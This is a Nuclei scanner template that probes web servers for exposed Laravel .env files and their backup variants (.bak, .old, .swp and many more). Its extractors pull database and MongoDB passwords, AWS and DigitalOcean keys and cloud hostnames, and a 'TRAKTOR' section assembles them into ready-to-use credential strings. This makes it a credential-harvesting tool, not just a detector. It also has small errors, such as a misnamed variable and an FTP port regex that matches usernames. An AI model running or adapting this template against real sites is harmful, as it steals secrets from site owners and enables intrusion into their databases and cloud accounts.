id: env-exp
info:
  name: Laravel .env file accessible
  author: nucleixivanovich
  severity: critical
  description: Laravel uses the .env file.
  reference: https://neal.fun/
  tags: config,exposure,laravel
http:
  - method: GET
    path:
      - "{{BaseURL}}{{filepath}}{{bakext}}"
      
    attack: clusterbomb

    payloads:
      filepath:

        - /.env     
#        - /api/.env
#        - /dev/.env
#        - /.env.{{DN}}
#        - /.env.{{SD}}

      bakext:
        - ' ' 
        - .~
        - .dev
        - .bk
        - .bak
        - .bkp
        - .BAK
        - .stage
        - .live
        - .blank
        - .swp
        - .swo
        - .swn
        - .tmp
        - .save
        - .old
        - .new
        - .orig
        - .dist
        - .eski  # Turkish word for .bak its common on file backups
        - .txt
        - .disabled
        - .original
        - .backup
        - _bak
        - _1.bak
        - ~
        - !
        - .0
        - .1
        - .2
        - .3
        - .development.local
        - .php-backup
        - -backup.txt
        - .production

    stop-at-first-match: true
    
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
          - 206
        condition: or

      - type: regex
        regex:
          - "(?mi)^APP_(NAME|ENV|KEY|DEBUG|URL|PASSWORD)="
          - "(?mi)^DB_(HOST|PASSWORD|DATABASE)="
          - "(?mi)^(SQS|SNS|SES|BACKUP|AWS)_(ACCESS_KEY_ID|SECRET_ACCESS_KEY)[=:](.*?)"
          - '(?i)(FTP_(USER|PASS))'
          - '(?i)aws_access_key_id\s*=\s*'
        condition: or

    extractors:
      - type: regex
        part: body
        name: db_host
        internal: true
        group: 3
        regex:
          - "(?mi)\\n(MYSQL|DB|DATABASE)_(HOST|SERVER|HOSTNAME)\\s*[=:]\\s*(.*?)$"   

      - type: regex
        part: body
        name: db_port
        internal: true       
        group: 2
        regex:
          - "(?mi)\\n(MYSQL|DB|DATABASE)_PORT\\s*[=:]\\s*(.*?)$"

      - type: regex
        part: body
        name: db_name
        internal: true       
        group: 3
        regex:
          - "(?mi)\\n(MYSQL|DB)_(DATABASE|NAME)\\s*[=:]\\s*(.*?)$"   

      - type: regex
        part: body
        name: db_user
        internal: true       
        group: 3
        regex:
          - "(?mi)\\n(MYSQL|DB|DATABASE)_(USER|USERNAME)\\s*[=:]\\s*(.*?)$"

      - type: regex
        part: body
        name: db_password
        internal: true       
        group: 3
        regex:
          - "(?mi)\\n(MYSQL|DB|DATABASE)_(PASS|PASSWORD|PASSWD|ROOT_PASSWORD)\\s*[=:]\\s*(.*?)$"

      - type: regex
        part: body
        name: mongo_host
        internal: true
        group: 3
        regex:
          - "(?mi)\\n(MONGO_DB|MONGO)_(HOST|SERVER|HOSTNAME)\\s*[=:]\\s*(.*?)$"   

      - type: regex
        part: body
        name: mongo_port
        internal: true       
        group: 2
        regex:
          - "(?mi)\\n(MONGO_DB|MONGO)_PORT\\s*[=:]\\s*(.*?)$"

      - type: regex
        part: body
        name: mongo_name
        internal: true       
        group: 3
        regex:
          - "(?mi)\\n(MONGO_DB|MONGO)_(DATABASE|NAME)\\s*[=:]\\s*(.*?)$"   

      - type: regex
        part: body
        name: mongo_user
        internal: true       
        group: 3
        regex:
          - "(?mi)\\n(MONGO_DB|MONGO)_(USER|USERNAME)\\s*[=:]\\s*(.*?)$"

      - type: regex
        part: body
        name: mongo_password
        internal: true       
        group: 3
        regex:
          - "(?mi)\\n(MONGO_DB|MONGO)_(PASS|PASSWORD|PASSWD|ROOT_PASSWORD)\\s*[=:]\\s*(.*?)$" 
#
#      - type: regex
#        part: body
#        name: db_host1
#        internal: true
#        group: 3
#        regex:
#          - "(?mi)^(MYSQL|DB|DATABASE)_(HOST|SERVER|HOSTNAME)\\s*[=:]\\s*(.*?)$"
#
#      - type: regex
#        part: body
#        name: db_port1
#        internal: true       
#        group: 2
#        regex:
#          - "(?mi)^(MYSQL|DB|DATABASE)_PORT\\s*[=:]\\s*(.*?)$" 
#      - type: regex
#        part: body
#        name: db_name1
#        internal: true       
#        group: 3
#        regex:
#          - "(?mi)^(MYSQL|DB)_(DATABASE|NAME)\\s*[=:]\\s*(.*?)$"     
#      - type: regex
#        part: body
#        name: db_user1
#        internal: true       
#        group: 3
#        regex:
#          - "(?mi)^(MYSQL|DB|DATABASE)_(USER|USERNAME)\\s*[=:]\\s*(.*?)$"
#      - type: regex
#        part: body
#        name: db_password1
#        internal: true       
#        group: 3
#        regex:
#          - "(?mi)^(MYSQL|DB|DATABASE)_(PASS|PASSWORD|PASSWD|ROOT_PASSWORD)\\s*[=:]\\s*(.*?)$"           
#
      - type: regex
        part: body
        name: aws_key
        internal: true               
        regex:
          - "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Za-z0-9]{16}"

      - type: regex
        part: body
        name: aws_key
        internal: true
        group: 2           
        regex:
          - "(?mi)(.*?)\\s*[=:]\\s*((A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})\\n(.*?)\\s*[=:]\\s*(.*?)$"

      - type: regex
        part: body
        name: aws_sec
        internal: true               
        group: 5
        regex:
          - "(?mi)(.*?)\\s*[=:]\\s*((A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})\\n(.*?)\\s*[=:]\\s*(.*?)$"

      - type: regex
        part: body
        name: aws_key1
        internal: true               
        group: 2
        regex:        
          -  "(.*?)_ACCESS_KEY_ID=(.*?)\n"

      - type: regex
        part: body
        name: aws_sec1
        internal: true               
        group: 4
        regex:
          -  "(.*?)_SECRET_(.*?)KEY(.*?)=(.*?)\n"
#
#      - type: regex
#        part: body
#        name: oss_key
#        internal: true
#        group: 1
#        regex:
#          - "(?mi)\\nOSS_ACCESS_KEY\\s*[=:]\\s*(.*?)$"       
#          - "(?mi)\\nALIYUN_SLS_ACCESS_KEY\\s*[=:]\\s*(.*?)$"       
#          - "(?mi)\\nOSS_ACCESS_KEY_ID\\s*[=:]\\s*(.*?)$"       
#          - "(?mi)\\nALIYUNKEY\\s*[=:]\\s*(.*?)$"                                     
#
#      - type: regex
#        part: body
#        name: oss_sec
#        internal: true
#        group: 1
#        regex:
#          - "(?mi)\\nOSS_SECRET_KEY\\s*[=:]\\s*(.*?)$"           
#          - "(?mi)\\nALIYUN_SLS_ACCESS_SECRET\\s*[=:]\\s*(.*?)$"          
#          - "(?mi)\\nOSS_ACCESS_KEY_SECRET\\s*[=:]\\s*(.*?)$"          
#          - "(?mi)\\nALIYUNSECRET\\s*[=:]\\s*(.*?)$"                              
#
      - type: regex
        part: body
        name: do
        internal: true
        group: 3
        regex:
          - "(?mi)\\nDIGITALOCEAN_SPACES_KEY\\s*[=:]\\s*(.*?)$"   
#
      - type: regex
        part: body
        name: do_sec
        internal: true       
        group: 2
        regex:
          - "(?mi)\\nDIGITALOCEAN_SPACES_SECRET\\s*[=:]\\s*(.*?)$"

      - type: regex
        part: body
        name: do_1
        internal: true       
        group: 3
        regex:
          - "(?mi)\\nDO_SPACES_KEY\\s*[=:]\\s*(.*?)$"   
#
      - type: regex
        part: body
        name: do_sec1
        internal: true       
        group: 3
        regex:
          - "(?mi)\nDO_SPACES_SECRET\\s*[=:]\\s*(.*?)$"
#          
#      - type: regex
#        part: body      
#        name: stripe
#        regex:
#          - '[rps]k_live_[a-zA-Z0-9]{20,30}'
#          
      - type: regex
        part: body      
        name: aws_rds
        regex:
          - '[0-9a-z._-]+.rds.amazonaws.com'

      - type: regex
        name: amazon-aws
        regex:
          - "^(.*?)\\.amazonaws.com"
          - "^(.*?)\\.elasticbeanstalk.com"
          - "^(.*?)\\.awsglobalaccelerator.com"

      - type: regex
        name: digitalocean
        regex:
          - "^(.*?)\\.ondigitalocean.app"
          - "^(.*?)\\.ondigitalocean.com"

      - type: regex
        name: ec2-host
        regex:
          - "ec2-[-\\d]+\\.compute[-\\d]*\\.amazonaws\\.com"
          - "ec2-[-\\d]+\\.[\\w\\d\\-]+\\.compute[-\\d]*\\.amazonaws\\.com"

      - type: regex
        name: s3-host
        regex:
          - "[a-zA-Z0-9_-]*\\.s3\\.amazonaws.com"
          - "[a-z0-9.-]+\\.s3\\.amazonaws\\.com"
          - "[a-z0-9.-]+\\.s3-[a-z0-9-]\\.amazonaws\\.com"
          - "[a-z0-9.-]+\\.s3-website[.-](eu|ap|us|ca|sa|cn)"
          - "s3\\.amazonaws\\.com/[a-z0-9._-]+"   
#
#      - type: regex
#        part: body      
#        name: aws_s3_bucket
#        regex:
#          - s3://[0-9a-z._/-]+
#
#      - type: regex
#        part: body      
#        name: digitaloceantoken
#        regex:
#          - (?:digitalocean).{0,40}\b([A-Za-z0-9_-]{64})\b
#
#      - type: regex
#        part: body
#        name: ftp_host
#        internal: true
#        group: 1
#        regex:
#          - "(?mi)\nFTP_HOST\\s*[=:]\\s*(.*?)$"   
#
#      - type: regex
#        part: body
#        name: ftp_pass
#        internal: true
#        group: 1
#        regex:
#          - "(?mi)\nFTP_PASSWORD\\s*[=:]\\s*(.*?)$"   
#
#      - type: regex
#        part: body
#        name: ftp_user
#        internal: true
#        group: 1
#        regex:
#          - "(?mi)\nFTP_USERNAME\\s*[=:]\\s*(.*?)$"   
#
#      - type: regex
#        part: body
#        name: ftp_port
#        internal: true
#        group: 1
#        regex:
#          - "(?mi)\nFTP_USERNAME\\s*[=:]\\s*(.*?)$"   

#      - type: regex
#        part: body
#        name: ssh_host
#        internal: true
#        group: 1
#        regex:
#          - "(?mi)\nSSH_HOST\\s*[=:]\\s*(.*?)$"
#
#      - type: regex
#        part: body
#        name: ssh_pass
#        internal: true
#        group: 1
#        regex:
#          - "(?mi)\nSSH_PASSWORD\\s*[=:]\\s*(.*?)$"
#
#      - type: regex
#        part: body
#        name: ssh_user
#        internal: true
#        group: 1
#        regex:
#          - "(?mi)\nSSH_USERNAME\\s*[=:]\\s*(.*?)$"
#
############# TRAKTOR ############       
#
      - type: dsl  # type of the extractor
        name: aws_leak
        dsl:
          - '"AWS_KEY=" + aws_key + "|AWS_SEC=" + aws_sec '
#
      - type: dsl  # type of the extractor
        name: aws_leak1
        dsl:
          - '"AWS_KEY=" + aws_key1 + "|AWS_SEC=" + aws_sec1 '
#
      - type: dsl  # type of the extractor
        name: do_leak
        dsl:
          - '"DO_KEY=" + do + "|DO_SEC=" + do_sec '
#
      - type: dsl  # type of the extractor
        name: do_leak1
        dsl:
          - '"DO_KEY=" + do_1 + "|DO_SEC=" + do_sec_1 '
#
      - type: dsl
        name: db1
        dsl:
          - '"DB_HOST=" + db_host + "|DB_PORT=" + db_port + "|DB_USER=" +  db_user + "|DB_PASSWORD=" + db_password + "|DB_NAME=" + db_name'          
#
#      - type: dsl
#        name: db2
#        dsl:
#          - '"DB_HOST=" + db_host1 + "|DB_PORT=" + db_port1 + "|DB_USER=" +  db_user1 + "|DB_PASSWORD=" + db_password1 + "|DB_NAME=" + db_name1'
#
      - type: dsl
        name: db_cred
        dsl:
          - '"DB_HOST=" + db_host + "|DB_PORT=" + "3306" + "|DB_USER=" +  db_user + "|DB_PASSWORD=" + db_password + "|DB_NAME=" + db_name '
#
      - type: dsl
        name: mongo
        dsl:
          - '"MONGO_HOST=" + mongo_host + "|MONGO_PORT=" + "27017" + "|MONGO_USER=" +  mongo_user + "|MONGO_PASSWORD=" + mongo_password + "|MONGO_NAME=" + "dbname" '
#
      - type: dsl
        name: mongodb
        dsl:
          - '"MONGO_HOST=" + mongo_host + "|MONGO_PORT=" + mongo_port + "|MONGO_USER=" +  mongo_user + "|MONGO_PASSWORD=" + mongo_password + "|MONGO_NAME=" + mongo_name'
#
#      - type: dsl
#        name: ftp
#        dsl:
#          - '"FTP_HOST=" + ftp_host + "|FTP_USER=" + ftp_user + "|FTP_PASS=" + ftp_pass'
#
#      - type: dsl
#        name: ssh
#        dsl:
#          - '"SSH_HOST=" + ssh_host + "|SSH_USER=" + ssh_user + "|SSH_PASS=" + ssh_pass'          